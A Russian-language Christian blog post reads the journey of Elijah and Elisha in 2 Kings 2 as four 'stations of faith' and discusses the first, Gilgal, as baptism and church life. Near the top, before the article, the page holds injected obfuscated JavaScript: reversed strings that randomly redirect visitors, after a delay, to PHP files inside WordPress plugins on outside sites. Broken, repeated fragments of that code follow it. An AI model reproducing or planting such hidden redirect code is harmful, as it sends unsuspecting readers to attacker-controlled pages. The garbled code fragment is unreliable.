Мысли на тему

Куда заводит христианство?


$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

Слушать аудио версию этой статьи здесь или здесь

Вот, допустим, сделались вы христианином. Ну и что? Что дальше? Христианство, апостолы и их ученики называли ёмким словом «Путь». Обычно, концом пути сегодня (да и давно уже) становится церковь. И это тоже неплохо. Но, вот, я хочу, всё-таки, показать полноту этого Пути — куда может завести христианство, Путь — если отдаться этому Пути. Но я ни в коем случае никого не приглашаю на этот Путь. Вы увидите вскоре — почему?

Станции веры, или странное путешествие христианина

Путь христианина в своей полноте — это путь Христа. Этот путь довольно четко очерчен в Библии некиими станциями веры. Сегодня я познакомлю вас очень кратко с тремя самыми главными станциями христианского пути — а также с последней, четвертой станцией. В основу я возьму самое странное путешествие (а путешествие христианина, его (её) духовный путь — очень странный и непростой), о котором только говорится в Библии. О путешествии, которое, как кажется, не имеет смысла, путешествии, от которого отговаривает товарища сам пророк Илия.

Записана эта история в Библии, в 4-й Книге Царств. И, думаю, интересна она будет всякому христианину, — поскольку показывает нам тот нескучный путь, тот великий путь, который остаётся в целом нехоженым. Особенно эта история будет интересна тем, кто верит, что в последние времена Бог даст миру Белого царя и Белого пророка — прототипами которых и являются герои этого рассказа: пророк Илия и пророк Елисей — два верных свидетеля, и оба — приходящие буквально «в духе Илии».

Так вот, эта история показывает тот духовный путь, который открывается перед каждым христианином, но на который вступают очень немногие, а проходят его, похоже, Белый царь и Белый пророк — а возможно и те, кто идут с ними. Итак, во второй главе книги Царств (название-то какое — царское!) пророк Илия уходит в Небо на огненной колеснице. Но прежде Илия (прототип Белого пророка) берёт своего ученика Елисея (которому суждено было стать прообразом Белого царя) в очень необычное путешествие.

О цели этого путешествия ничего не сказано, и кажется оно бессмысленным и пустым, большой и тяжкой прогулкой — пока мы не достигаем конца этого путешествия. Но обо всём по порядку. Предлагаю вам самим прочитать теперь эту историю, а я ее затем постараюсь немного объяснить:

Четыре станции веры

«В то время, как Господь восхотел вознести Илию в вихре на небо, шел Илия с Елисеем из Галгала»(первая станция веры — О.Ж.).

И сказал Илия Елисею: останься здесь, ибо Господь посылает меня в Вефиль (вторая станция веры — О.Ж.).

Но Елисей сказал: жив Господь и жива душа твоя! не оставлю тебя. И пошли они в Вефиль…

И сказал ему Илия: Елисей, останься здесь, ибо Господь посылает меня в Иерихон. И сказал он: жив Господь и жива душа твоя! не оставлю тебя. И пришли в Иерихон» (третья станция веры — О.Ж.)…

И сказал ему Илия: останься здесь, ибо Господь посылает меня к Иордану (четвертая станция веры — О.Ж.). И сказал он: жив Господь и жива душа твоя! не оставлю тебя. И пошли оба.»

А далее идет история вознесения пророка Илии и о том чудесном, что случилось с Елисеем. Но прежде давайте разберёмся — что это за путешествие такое? Зачем оно? Почему оно в Библии?

Это путешествие, в которое Илия взял своего ученика, является подведением итогов жизни помазанника — величайшего звания во Христе. Илия проводит Елисея через этапы своей жизни и через этапы жизни человека вообще, который «сошёл с рельсов» и пошел за Богом. Елисею был вполне понятен смысл этого путешествия — и каждой станции веры. Дело в том, что каждое обозначенное здесь, на карте этого путешествия, место — имеет ярко выраженную смысловую, идейную, событийную нагрузку. В каждом из этих мест с народом Божиим (или с отдельными Божиими человеками) происходили четко обозначенные вещи, характеризующие направление, результаты и достижения этого путешествия. Сегодня — только первую станцию рассмотрим. И это немало.

Станция первая — Галгал

Здесь, собственно, и начинается путешествие христианина (или может начаться), и здесь же оно для большинства христиан и заканчивается. Галгал был тем первым местом в Земле Обетованной, в которое народ Израильский вступил по прошествии 40 лет странствия по пустыне. Они обрели спасение:

«И сказал Господь Иисусу (Навину): ныне Я снял с вас посрамление Египетское. Почему и называется то место «Галгал», даже до сего дня. И стояли сыны Израилевы станом в Галгале и совершили Пасху в четырнадцатый день месяца вечером на равнинах Иерихонских».

Иисус Навин 5:9-10

Когда они пересекли Иордан — что Новый Завет приравнивает ко крещению — они обрели свое спасение, свою обетованную землю. Галгал был первым местом, куда они вступили. Говоря современным языком, они крестились и пришли в церковь.

Потому Илия и говорит своему ученику (попробуем перефразировать): Ты можешь остаться здесь — ты ведь уже крестился, спасся. И большинство людей так и делают: ходят себе в церковь, ставят свечечки, другие церковные вещи делают — всё хорошо.

Тут, конечно, кто-то подскажет мне — а может, и не всё тут хорошо. Ведь и в церкви можно духовно умереть, или, еще хуже, превратиться в фарисея и лицемера. Интересно, что уже в следующем стихе говорится о чем-то очень важном, что большинство христиан испытывают в своей жизни — но не понимают, что это такое. Почитаем, и я постараюсь объяснить:

«И на другой день Пасхи стали есть из произведений земли сей, опресноки и сушеные зерна в самый тот день; а манна перестала падать на другой день после того, как они стали есть произведения земли, и не было более манны у сынов Израилевых, но они ели в тот год произведения земли Ханаанской

Иисус Навин 5:11-12

Во как! Манна, которая сама сыпалась с небес всю их сознательную жизнь — перестала выпадать! Как говорится, у меня есть две новости для вас: одна хорошая, и одна плохая. Сделавшись христианином, приняв крещение, исповедуя Христа — Пасху нашу — мы обретаем спасение, вступаем, верою, в обетованную землю. Становимся гражданами Небес. Но в то же самое время та манна, которая как бы сама собой сыпалась на нас всю жизнь с небес и подпитывала нас как-то духовно — перестаёт.

Я это испытал на себе. Ведь раньше, до прихода в церковь — нас как бы Бог окормлял, вёл, воспитывал. Я прекрасно помню, как в нужное время, как будто сами собой, попадались то нужные книги, то фильм, то человек, то обстоятельства жизни — и всё это напоминало о Боге, вело к Нему. Со всеми так Бог работает. Приход человека к вере, приход в церковь — это не заслуга человека, не заслуга церкви даже, а Божий дар, водительство.

Придя к вере, придя в церковь, человек полагает, что, вот, сейчас ещё больше манны духовной на него станет само собой сыпаться. И вот на этом этапе многие христиане начинают голодать. Обретя для себя церковь, они полагают, что духовная пища будет падать из церкви, как с Небес, что теперь-то церковь их насытит, займется их духовным окормлением. И церковь, безусловно, даёт какую-то пищу. Которую люди привыкли получать — за время в пустыне — как готовую стандартизированную, дозированную духовную пищу быстрого приготовления. И вот через некоторое время у людей развивается страшный авитаминоз. И они ничего не понимают: как так? Ведь раньше и в церкви не был, а как-то живее духовно себя чувствовал…

И тут большинство людей, увы, просто привыкают к такой скудной диете, духовной импотенции, что она начинает им даже нравиться — потому как другой пищи они не знают, и потому как «все» так, на таком пайке. Но вот, приведя нас ко спасению, Господь дал нам великий духовный Сад Своего Слова. В котором растут самые вкусные, невероятные фрукты и овощи, виноградники и зерновые, грибы и ягоды. Всё это Бог дал нам — как огромные, богатые, ухоженные огороды дачникам. Но тут надо самим ковыряться в земле, самим набраться терпения, самим закладывать в землю небольшие семена истины сперва, и выращивать их в великолепные плоды. Те, кто любит садоводство и огород — должны любить и Слово Божие.

Да-да, с приходом к Богу мы получаем от Него Слово. Это Слово только и может напитать нас духовно — да так, что вы и понятия не имеете, может быть. Это все равно, что человека, сидящему на «БП» макаронах всю жизнь — накормить свежей пищей. Да, непривычно. Но это — тот духовный пир, к которому привел нас Господь. И символически это было представлено народу через то, что манны больше не будет, а будет то, что вы вырастите в своем саду. А ничего не вырастите — так и умрёте духовно с голоду, пусть и в церковном садочке.

Вот мне постоянно пишут мои православные друзья (не все православные такие, конечно), что человеку в этот Сад Слова нельзя. Что туда ходили только отцы церкви, и то, что они там выходили, собрали — получите в церкви. Это, конечно, хорошо, что уже до нас в Саду побывали Божии люди. Только Сад этот Бог нам не воспретил, — а ввёл нас в него. И строго спросит с тех, кто препятствовал и препятствует людям войти в него, кто сам не питается от плодов Слова и другим не даёт.

Выводы

Галгал — это та самая первая, главная, спасательная станция веры — и если на ней не сидеть сложа руки, но возделывать свой духовный Сад, питаться ежедневно от Слова — то тут даже пророк Илия, грозный пророк, скажет вам: «Оставайся здесь, ты — молодец». И Елисей бы там остался — не знай он чего-то большего — не знай он Илию. И Елисей, несмотря на то, что в этом, казалось, не было уже нужды, несмотря на то, что он уже спасся, попал в свою церковь, в Галгал — хочет идти дальше. Что же дальше? А дальше — следующая станция веры, на которую можно прийти, а можно не прийти. Но если ты на неё все же пришёл, то уйдешь ты с неё другим человеком. Это — станция Вефиль, о которой мы поговорим в следующей статье.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, ВКонтакте

4/5

You Might Also Like

1 Comment

Leave a Reply

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.